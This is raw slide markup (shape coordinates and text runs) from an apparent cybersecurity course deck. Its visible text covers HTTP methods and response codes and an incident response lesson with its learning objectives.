                    <a:pt x="2032" y="1007999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30505" y="1055293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62509" y="1099832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95834" y="1143596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130302" y="1186522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165773" y="1228547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202057" y="1269619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225869" y="1261618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249847" y="1255903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274180" y="1252474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299085" y="1251331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347916" y="1255814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395439" y="1268844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440347" y="1289862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481330" y="1318260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518299" y="1354442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547827" y="1395349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569760" y="1439976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583946" y="1487309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590194" y="1536319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588391" y="1585976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630631" y="1611287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673569" y="1635467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717181" y="1658518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761453" y="1680425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806361" y="1701152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851890" y="1720684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="898017" y="1739011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="944714" y="1756105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991971" y="1771929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039774" y="1786496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1088097" y="1799767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1136916" y="1811731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1186218" y="1822361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1235976" y="1831632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1286192" y="1839531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1336814" y="1846046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1387843" y="1851139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439265" y="1854809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1491043" y="1857019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543177" y="1857756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580819" y="1857502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1599463" y="1856905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1618488" y="1855724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823801" y="5215127"/>
              <a:ext cx="1688464" cy="1838325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1688465" h="1838325">
                  <a:moveTo>
                    <a:pt x="470992" y="525729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="463537" y="479272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447611" y="435711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424002" y="396227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393509" y="361975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356920" y="334124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315036" y="313829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268643" y="302260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221437" y="299745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175933" y="306844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133261" y="322745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94589" y="346621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61023" y="377621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33718" y="414921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13804" y="457682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="505079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="553834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6972" y="600570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22567" y="644232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45948" y="683742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76301" y="718019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112814" y="746010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154673" y="766610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201079" y="778764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248856" y="780630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294665" y="773010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337439" y="756754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376123" y="732637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409689" y="701484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437083" y="664108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457263" y="621322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469176" y="573913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470992" y="525729"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1688465" h="1838325">
                  <a:moveTo>
                    <a:pt x="1687995" y="2032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="547789" y="2032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541820" y="2032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539788" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519912" y="42811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501015" y="86118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483158" y="129921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466369" y="174218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450684" y="218998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436156" y="264261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422821" y="310007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435864" y="321373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448144" y="333870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494652" y="401205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512394" y="444423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523379" y="489686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527304" y="536282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523913" y="583565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512660" y="633768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493306" y="680402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466674" y="722655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433603" y="759663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394919" y="790587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351447" y="814578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351447" y="830834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="883373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354279" y="935583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357784" y="987437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362661" y="1038936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368896" y="1090041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376453" y="1140739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385318" y="1191006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395465" y="1240815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406869" y="1290167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419531" y="1339024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433412" y="1387360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448500" y="1435163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464769" y="1482420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482206" y="1529092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500773" y="1575181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520471" y="1620634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541261" y="1665465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563143" y="1709623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586066" y="1753108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610044" y="1795894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635038" y="1837944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1687995" y="2032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382512" y="3914330"/>
              <a:ext cx="2092960" cy="1258570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2092959" h="1258570">
                  <a:moveTo>
                    <a:pt x="1162850" y="248704"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1159941" y="201180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1147699" y="153606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126477" y="110210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1097978" y="73228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063434" y="43192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024102" y="20624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981252" y="6057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936117" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="889952" y="2997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844042" y="15557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="801497" y="37211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="765098" y="66332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735418" y="101650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712990" y="141871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698373" y="185699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692137" y="231876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694829" y="279095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707009" y="326072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728853" y="369570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="757834" y="406781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792746" y="437134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832319" y="460082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875334" y="475030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="920559" y="481406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966762" y="478637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012698" y="466153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055116" y="443928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091260" y="414502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1120609" y="379082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1142682" y="338848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1156931" y="294982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162850" y="248704"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2092959" h="1258570">
                  <a:moveTo>
                    <a:pt x="2092452" y="1258125"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1527683" y="246697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1525778" y="244665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1525778" y="238569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1472717" y="243319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1420507" y="249402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1368971" y="256844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317929" y="265633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1267218" y="275755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216660" y="287210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213256" y="305803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208735" y="324739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194816" y="362267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172806" y="403974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1145082" y="441223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112100" y="473405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074369" y="499948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032383" y="520255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980630" y="534987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354" y="540575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="877658" y="536130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830211" y="523113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785736" y="502107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744982" y="473646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702106" y="498830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659968" y="525157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618578" y="552577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577964" y="581101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538137" y="610704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499110" y="641350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460921" y="673023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423557" y="705713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387070" y="739394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351472" y="774052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316763" y="809650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282981" y="846175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250139" y="883615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218249" y="921943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187350" y="961148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157441" y="1001191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128549" y="1042060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100685" y="1083741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73888" y="1126210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48158" y="1169441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23520" y="1213421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1258125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2092452" y="1258125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4637913" y="3911930"/>
            <a:ext cx="21717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5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8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dirty="0" sz="2200" spc="105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>P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con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ections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16300" y="7470724"/>
            <a:ext cx="297688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Fragment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5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anchor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ID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685146" y="4205427"/>
            <a:ext cx="266509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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="10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dirty="0" sz="2000" spc="-204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000" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>HEAD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246234" y="7765491"/>
            <a:ext cx="312610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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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(query</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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parameters)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448035" y="6166561"/>
            <a:ext cx="167132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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>PO</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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7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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="9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17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96093" y="6152769"/>
            <a:ext cx="18542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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>3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170923" y="4238625"/>
            <a:ext cx="18542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40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220204" y="3959733"/>
            <a:ext cx="18542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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>1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962401" y="5541721"/>
            <a:ext cx="318897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016250" algn="l"/>
              </a:tabLst>
            </a:pP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HTTP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spon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cod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	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" baseline="1262" sz="3300" spc="-202">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr baseline="1262" sz="33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89597" y="7444231"/>
            <a:ext cx="18542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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>5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642731" y="7752689"/>
            <a:ext cx="18542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35">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>4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888" y="231647"/>
            <a:ext cx="3236976" cy="9144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993898" y="4258436"/>
            <a:ext cx="6209030" cy="835660"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="60960" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2261870" marR="5080" indent="-2249805">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="185"/>
              <a:t>Domai</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="195"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140"/>
              <a:t>4:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="215"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="160"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120"/>
              <a:t>tion</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90"/>
              <a:t>Incident  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125"/>
              <a:t>Response</a:t>
            </a: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888" y="231647"/>
            <a:ext cx="3236976" cy="9144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71976" y="4258436"/>
            <a:ext cx="536575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20"/>
              <a:t>Performing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="95"/>
              <a:t>Incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125"/>
              <a:t>Response</a:t>
            </a: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02278" y="784098"/>
            <a:ext cx="3538854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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Learning</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objectives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9692" y="1187196"/>
            <a:ext cx="4820411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97763" y="2254757"/>
            <a:ext cx="7647305" cy="25088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2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end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this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lesson,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you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will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able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to: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 marL="626110">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2160"/>
              </a:spcBef>
            </a:pP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Analyze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incident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response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procedures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 marL="626110">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2685"/>
              </a:spcBef>
            </a:pP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Utilize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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>appropriate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sources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incident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response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11605" y="5576442"/>
            <a:ext cx="5601970" cy="15214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Apply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mitigation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controls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Illustrate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incident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eradication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recovery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3191255"/>
            <a:ext cx="457200" cy="4572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4299203"/>
            <a:ext cx="457200" cy="4572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5472684"/>
            <a:ext cx="457200" cy="4572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6652259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47538" y="4258436"/>
            <a:ext cx="536194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95"/>
              <a:t>Incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125"/>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>Procedures</a:t>
            </a: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72403" y="306451"/>
            <a:ext cx="47085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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident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125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response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105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Process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50664" y="760476"/>
            <a:ext cx="7167372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514726" y="1882292"/>
            <a:ext cx="11223625" cy="13093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Incident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response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policy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sets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resources,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processes,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guidelines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dealing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with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incidents.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Incident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management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vital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mitigating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risk.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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follows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structured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process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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>as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shown: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28825" y="4890770"/>
            <a:ext cx="1845310" cy="1358900"/>
            <a:chOff x="1528825" y="4890770"/>
            <a:chExt cx="1845310" cy="1358900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1541525" y="4903470"/>
              <a:ext cx="1819910" cy="1333500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1819910" h="1333500">
                  <a:moveTo>
                    <a:pt x="1597406" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="222250" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177477" y="4517"/>
                  </a:lnTo>
                  <a:lnTo>
